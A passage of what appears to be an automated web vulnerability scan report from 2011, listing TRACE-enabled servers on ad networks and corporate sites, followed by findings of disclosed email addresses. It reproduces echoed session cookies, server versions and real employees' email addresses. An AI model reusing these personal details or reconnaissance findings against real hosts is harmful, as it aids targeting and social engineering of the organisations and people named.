x-forwarded-for: 50.23.123.106, 66.114.50.83
x-forwarded-ip: 50.23.123.106
x-initial-url: http://cache.specificmedia.com/
cookie: f53e197770403d15; ADVIVA=NOTRACK
connection: keep-alive

21.6. http://channelsun.sun.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://channelsun.sun.com
Path:   /

Request

TRACE / HTTP/1.0
Host: channelsun.sun.com
Cookie: ea51b22241e16837

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 96
Date: Tue, 06 Sep 2011 16:13:09 GMT
Connection: close

TRACE /grails/index/home.dispatch HTTP/1.0
host: channelsun.sun.com
cookie: ea51b22241e16837

21.7. http://clk.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: ce10ba4a23a9a782

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: ce10ba4a23a9a782; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; opt=1; cmp=1
...[SNIP]...

21.8. http://convctr.overture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://convctr.overture.com
Path:   /

Request

TRACE / HTTP/1.0
Host: convctr.overture.com
Cookie: b5945fa6764d0756

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: b5945fa6764d0756; BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=; SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZ
...[SNIP]...

21.9. http://d.ads.readwriteweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.ads.readwriteweb.com
Cookie: e272a21bacc1f45b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.ads.readwriteweb.com
Cookie: e272a21bacc1f45b; OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B
Connection: close
X-Forwarded-For: 50.2
...[SNIP]...

21.10. http://d1.openx.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 499bc3208bbaf8b1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 499bc3208bbaf8b1; OAID=eed20980e83e7cfea7f31868510023af
X-Forwarded-For: 50.23.123.106, 10.5.253.2


21.11. http://deloitte.12hna.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deloitte.12hna.com
Path:   /

Request

TRACE / HTTP/1.0
Host: deloitte.12hna.com
Cookie: 9c55e37e898445f3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.4.0-0.dotdeb.0 mod_ssl/2.8.9 OpenSSL/0.9.6c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9c55e37e898445f3
Host: deloitte.12hna.com


21.12. http://dev.mysql.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dev.mysql.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dev.mysql.com
Cookie: 9e0ec2102bd4e024

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:54 GMT
Server: Apache/2.2.19 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dev.mysql.com
Cookie: 9e0ec2102bd4e024; MySQL_S=icd8ngn97qr19vmiubeprn5dg5


21.13. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 7543b345a20f8fb

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 7543b345a20f8fb; traffic_control=f00100000060910000168986600130000020084302a10001%3A300%3A112; d=42ac07acc70c6d94d4f647a26c983e282d43b7e0b45ba7abe20c37698a901ebe
Connection: Keep-Alive
X-forwarded-for: 50.23.123.10
...[SNIP]...

21.14. https://dne.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dne.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dne.oracle.com
Cookie: 5a4f5828fcbb3d45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:33 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5a4f5828fcbb3d45; BIGipServermktap-dne_http_pool=2953613965.3848.0000; s_cc=true; s_wgw_lv_s=First%20Visit; p_mcc=WWOCOMINTMAINPAGEBNR8da1b; p_org_id=1001; p_lang=US; shopCartId=6496552; source=OU; territoryCode=US; o
...[SNIP]...

21.15. http://dynpages-mktas.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dynpages-mktas.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dynpages-mktas.oracle.com
Cookie: 63786d87af05a9b7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:35 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 63786d87af05a9b7; s_cc=true; s_wgw_lv_s=First%20Visit; p_mcc=WWOCOMINTMAINPAGEBNR8da1b; p_org_id=1001; p_lang=US; shopCartId=6496552; source=OU; territoryCode=US; org_id=1001; lang=US; SearchParams-cookie=%3CSearchPar
...[SNIP]...

21.16. http://education.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: education.oracle.com
Cookie: 100c93683da489bc

Response

HTTP/1.1 200 OK
Content-Type: message/http
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057691094728704,0)
Content-Length: 577
Date: Tue, 06 Sep 2011 15:54:56 GMT

TRACE / HTTP/1.1
Connection: Keep-Alive
Cookie: 100c93683da489bc; BIGipServerfapap-education_http_pool=2534249101.24862.0000; s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25
...[SNIP]...

21.17. https://education.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: education.oracle.com
Cookie: b0e7a50feb3ea41e

Response

HTTP/1.1 200 OK
Content-Type: message/http
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115362442430059,0)
Content-Length: 722
Date: Tue, 06 Sep 2011 16:00:49 GMT

TRACE / HTTP/1.1
Connection: Keep-Alive
Cookie: b0e7a50feb3ea41e; shopCartId=deleted; source=deleted; org_id=deleted; lang=deleted; territoryCode=deleted; JSESSIONID=296f58b30d8bf36ac8351a3c4f52694a554feac8fa994cae89b313a158bdb177.e34MaNqNax0RbO0Qbh8Tbh4Mbxz0.1; nO
...[SNIP]...

21.18. http://fido.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fido.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: fido.fetchback.com
Cookie: 6d071c91a467bef0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: fido.fetchback.com
Cookie: 6d071c91a467bef0; JSESSIONID=429C8C2837D4276076F2BA795EBE1EF0.jvmdb3; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|ut
...[SNIP]...

21.19. http://imp.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: cfb5c538100001de

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: cfb5c538100001de; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_131318
...[SNIP]...

21.20. http://legolas.nexac.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /

Request

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: b48bdce55b91b692

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: legolas.nexac.com
Cookie: b48bdce55b91b692; lgtix=SQACADUB; na_id=ignore; na_tc=Y; OAX=Mhd7ak48ZSEAAtYi
X-Forwarded-For: 50.23.123.106


21.21. http://msnbcmedia.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbcmedia.msn.com
Path:   /

Request

TRACE / HTTP/1.0
Host: msnbcmedia.msn.com
Cookie: 3816ff354b1c074f

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 15:08:36 GMT
Content-Type: message/http
Content-Length: 616
Expires: Tue, 06 Sep 2011 15:08:36 GMT
Connection: close

TRACE / HTTP/1.0
Host: msnbcmedia.msn.com
Cookie: 3816ff354b1c074f; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; TOptOut=1; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:
...[SNIP]...

21.22. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 9154129bdfca7a14

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9154129bdfca7a14; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

21.23. http://ping.crowdscience.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ping.crowdscience.com
Cookie: 798b459e39cdfb17

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Content-Type: message/http
Date: Tue, 06 Sep 2011 15:32:56 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-Proto: http
Host: ping.crowdscience.com
X-Cluster-Client-Ip: 50.23.123.106
Cookie: 798b459e39cdfb17; __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Connection: Keep-Alive


21.24. http://pixel.everesttech.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: fefd9dd3df6e0f8c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: fefd9dd3df6e0f8c; gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; everest_session_v2=ts5OZjd7UQcAAI3@
Connection: Keep-Alive
X-EF-Forwarded-For: 50.23.123.106


21.25. http://pixel.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: d4fd0ffa3d47f679

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: d4fd0ffa3d47f679; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; eng=1_131367
...[SNIP]...

21.26. http://r.openx.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 48163cefde847169

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 48163cefde847169; p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f
X-Forwarded-For: 50.23.123.106


21.27. http://rt.legolas-media.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 139323cd46f98b49

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 139323cd46f98b49; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB


21.28. http://serve.directdigitalllc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: serve.directdigitalllc.com
Cookie: 4dbf8df06c6498b6

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Tue, 06 Sep 2011 15:15:58 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 183
Connection: Close

TRACE / HTTP/1.1
host: serve.directdigitalllc.com
Cookie: 4dbf8df06c6498b6
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


21.29. http://tap.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 253e5867faf3ceb6

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 253e5867faf3ceb6; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

21.30. http://tracker.wordstream.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.wordstream.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracker.wordstream.com
Cookie: c22d18764c46e182

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.wordstream.com
Cookie: c22d18764c46e182


21.31. http://tracking.hubspot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hubspot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: c3a9c6a20fa59d45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:27:56 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: c3a9c6a20fa59d45; .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-0
...[SNIP]...

21.32. http://www.beautyproductsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.beautyproductsdirect.com
Cookie: aa40a3667cf5f260

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:23 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa40a3667cf5f260
Host: www.beautyproductsdirect.com


21.33. http://www.fekkai.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fekkai.com
Cookie: f416391d50c085ae

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fekkai.com
Cookie: f416391d50c085ae; fekkai_flash_intro_cookie=True


21.34. http://www.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 8d1db15e52e7b97d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:41 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetchback.com
Cookie: 8d1db15e52e7b97d; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_131318
...[SNIP]...

21.35. http://www.gillettevenus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gillettevenus.com
Cookie: 72dfe71d12de6daa

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gillettevenus.com
Cookie: 72dfe71d12de6daa; preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61


21.36. http://www.readwriteweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.readwriteweb.com
Cookie: 4eb89b621c4755a9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.x (Hardened)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.readwriteweb.com
Cookie: 4eb89b621c4755a9; PHPSESSID=uu8u8il3haqs9qituee6bsgku7; mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B


22. Email addresses disclosed
There are 119 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


22.1. http://ads1.msn.com/library/dap.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; Sample=43; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:26:18.658&v=2; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; __qca=P0-302102338-1314847295226; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; VWCUKP300=L123100/Q74127_14103_2078_083111_1_090411_476531x468891x083111x1x1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Tue, 06 Sep 2011 15:00:13 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 23:19:17 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 06 Sep 2011 23:25:14 GMT
Content-Length: 13811
X-WR-MODIFICATION: Content-Length
Connection: keep-alive


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

22.2. http://assets1.csc.com/es/downloads/7380_2.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /es/downloads/7380_2.pdf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /es/downloads/7380_2.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: 1vptvkdbk27rpKm8gktp99PjKr2H3nFbiLFY+PGrKUxDkGYoKaaXHRZvwxnB+eu+
x-amz-request-id: 5E4300587F716F53
Date: Tue, 06 Sep 2011 17:06:02 GMT
Last-Modified: Thu, 13 Nov 2008 12:16:15 GMT
ETag: "f216d5d5987acb4495ffec28a81cfbf6"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 3210194
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b910ab2588d6c1aa584cbfe23779883d9f19ff58eb141762f7f07a92f22f036c35a02ee70c0c43b4
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.6%....
645 0 obj<</PageMode/UseOutlines/ViewerPreferences<</Direction/L2R>>/Outlines 696 0 R/Metadata 642 0 R/AcroForm 646 0 R/Pages 632 0 R/PageLayout/SinglePage/OpenAction 1243 0 R/Type/Ca
...[SNIP]...
<rdf:li>tgraner@csc.com</rdf:li>
...[SNIP]...
</URI(mailto:rknode@csc.com)/S/URI>
...[SNIP]...
</URI(mailto:wkoff@csc.com)/S/URI>
...[SNIP]...
</URI(mailto:wkoff@csc.com)/S/URI>
...[SNIP]...
</URI(mailto:pgustafs@csc.com)/S/URI>
...[SNIP]...
</CreationDate(D:20071012150001-07'00')/Author(tgraner@csc.com)/Creator(Adobe InDesign CS3 \(5.0\))/Producer(Adobe PDF Library 8.0)/ModDate(D:20071016104119-07'00')/Trapped/False>
...[SNIP]...

22.3. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: zYYJljlF5SFE+GrD4CJRlBUcaGTK1OuLAnYS8gsTn5kHdogibKjGZ/Zkyh5XQiZb
x-amz-request-id: 7262CFD5F70F1995
Date: Tue, 06 Sep 2011 17:06:04 GMT
Last-Modified: Mon, 08 Jun 2009 18:04:03 GMT
ETag: "600baff3759b06e56fd71b9bed3cb369"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 1587670
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: f6b26ddea16ad0da23493e32edb9bf8a272ca7921b731bc65066ee96909744e4136b8374a30ab146
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 381 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 18/Kids[ 3 0 R 15 0 R 25 0 R 33 0 R 41 0 R 79
...[SNIP]...
</Type/Action/S/URI/URI(mailto:TESTING.COE@CSC.COM) >
...[SNIP]...
</Type/Action/S/URI/URI(mailto:wmcgirr@csc.com) >
...[SNIP]...

22.4. http://blog.ulf-wendel.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="mailto:team@thephp.cc">team@thephp.cc</a>
...[SNIP]...
<a href="mailto:contact@qafoo.com">contact@qafoo.com</a>
...[SNIP]...

22.5. http://blogs.oracle.com/otn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /otn/ HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
